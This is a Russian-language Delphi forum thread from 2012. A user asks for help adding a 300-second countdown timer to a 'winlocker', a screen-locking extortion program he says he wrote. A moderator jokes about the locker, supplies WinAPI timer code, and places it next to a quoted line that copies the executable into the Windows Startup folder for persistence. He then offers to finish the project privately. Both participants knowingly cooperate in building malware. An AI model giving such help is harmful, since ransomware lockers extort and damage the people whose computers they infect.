Пятница, 15.12.2017, 15:18 Приветствую вас Гость | Группа "Гости" 


[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
Страница 1 из 11
Модератор форума: Anton93 
delfcode » Delphi » Компоненты Delphi » Ребят помогите с таймером
Ребят помогите с таймером
satahehok11Дата: Пятница, 14.12.2012, 10:54 | Сообщение # 1
Был не раз
Зарегистрирован: 21.11.2012
Группа: Пользователи
Сообщений: 5
Статус: Offline
Ребят помогите Вот сделал Винлокер хочу сделать что бы на форме еще был таймер отсчитывающий 300 сек . Чисто таймер получаеться а вот вместе с вирусняком ошибки . Я как бы не очень в программировании Помогите Вот сам винлокер и надо на таймер2 закинуть обратный отсчет

 
NeoДата: Пятница, 14.12.2012, 14:45 | Сообщение # 2
Модератор
Зарегистрирован: 04.05.2010
Группа: Модераторы
Сообщений: 316
Статус: Offline
Да,жёсткий у тебя винлокер biggrin
Ну когда же будут всё юзать API функции? Что с людьми сделало ООП.....
Вот тебе пример работы с таймером на WinApi.
Прикрепления: Timer.rar(2Kb)


Сообщение отредактировал Neo - Пятница, 14.12.2012, 15:03
 
satahehok11Дата: Пятница, 14.12.2012, 15:53 | Сообщение # 3
Был не раз
Зарегистрирован: 21.11.2012
Группа: Пользователи
Сообщений: 5
Статус: Offline
Quote (Neo)
будут всё юзать API функции? Что с людьми сделало ООП.....

спс огромное заранее посмотреть пока нет времени. Но Можно без эдитов а чисто 300 секунд и влить в мой код буду благдорен


Сообщение отредактировал satahehok11 - Пятница, 14.12.2012, 16:04
 
NeoДата: Пятница, 14.12.2012, 16:42 | Сообщение # 4
Модератор
Зарегистрирован: 04.05.2010
Группа: Модераторы
Сообщений: 316
Статус: Offline
Добавь перед IMPLEMENTATION
Code
   i:integer = 300; //секунд
     T:DWORD;

После {$R *.dfm} добавь
Code

Procedure Timer;
begin
dec(i);
if i=0 then
begin
KillTimer(GetForeGroundWindow,T); //останавливаю таймер T
MessageBox(GetForeGroundWindow,'Время вышло','Внимание',0);
//можно ещё чего-нибудь написать...
end;
end;

На событии FormCreate добавь перед строчкой
CopyFile(PChar(ParamStr(0)), PChar(GetSpecialPath($0007) + '\1.exe'), False);
вот это:
Code
SetTimer(Handle,T,1000,@Timer);

P.S
Выложи весь проект и я сделаю.Ото много лишнего кода у тебя.


Сообщение отредактировал Neo - Пятница, 14.12.2012, 16:56
 
satahehok11Дата: Пятница, 14.12.2012, 17:00 | Сообщение # 5
Был не раз
Зарегистрирован: 21.11.2012
Группа: Пользователи
Сообщений: 5
Статус: Offline
Quote (Neo)
Выложи проект и я покажу как надо добавить таймер.

Код который ты дал работает но не выводиться отсчет времени на форме а мне надо что бы выводился
Прикрепления: 7974046.rar(971Kb)


Сообщение отредактировал satahehok11 - Пятница, 14.12.2012, 17:04
 
NeoДата: Пятница, 14.12.2012, 17:24 | Сообщение # 6
Модератор
Зарегистрирован: 04.05.2010
Группа: Модераторы
Сообщений: 316
Статус: Offline
Ты забыл dfm файл залить.Ну да ладно.Вот как надо:
 
satahehok11Дата: Пятница, 14.12.2012, 17:36 | Сообщение # 7
Был не раз
Зарегистрирован: 21.11.2012
Группа: Пользователи
Сообщений: 5
Статус: Offline


Сообщение отредактировал satahehok11 - Пятница, 14.12.2012, 17:41
 
NeoДата: Пятница, 14.12.2012, 18:05 | Сообщение # 8
Модератор
Зарегистрирован: 04.05.2010
Группа: Модераторы
Сообщений: 316
Статус: Offline
Quote (satahehok11)
Мне надо что бы эти 300 сек были видны на форме

а,ну так бы сразу и сказал)))
пиши в аську - 642627547


Сообщение отредактировал Neo - Пятница, 14.12.2012, 18:06
 
satahehok11Дата: Пятница, 14.12.2012, 20:42 | Сообщение # 9
Был не раз
Зарегистрирован: 21.11.2012
Группа: Пользователи
Сообщений: 5
Статус: Offline
Спасибо Нео . Вопрос решен
 
delfcode » Delphi » Компоненты Delphi » Ребят помогите с таймером
Страница 1 из 11
Поиск:

delfcode.ru © 2008 - 2017 Хостинг от uCoz